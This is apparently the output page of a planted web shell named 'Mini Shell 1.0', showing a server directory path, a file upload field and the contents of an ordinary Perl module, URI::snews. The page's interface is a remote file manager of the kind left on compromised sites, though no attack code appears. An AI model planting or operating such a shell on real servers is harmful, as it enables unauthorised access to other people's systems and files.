HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/perl5/URI/
Upload File :
Current File : //proc/1991111/root/usr/share/perl5/URI/snews.pm
package URI::snews;  # draft-gilman-news-url-01

use strict;
use warnings;

our $VERSION = '5.17';

use parent 'URI::news';

sub default_port { 563 }

sub secure { 1 }

1;